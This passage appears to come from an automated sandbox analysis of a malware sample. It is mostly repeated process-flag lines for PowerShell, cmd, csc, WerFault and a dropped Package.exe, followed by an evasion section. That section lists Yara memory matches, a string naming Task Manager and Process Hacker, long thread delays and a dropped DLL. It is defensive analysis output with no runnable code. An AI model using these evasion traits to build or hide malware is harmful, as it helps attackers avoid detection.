            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2794Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 518Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4937Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4715Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5417Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4266Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Windows\Temp\iviewers.dllJump to dropped file
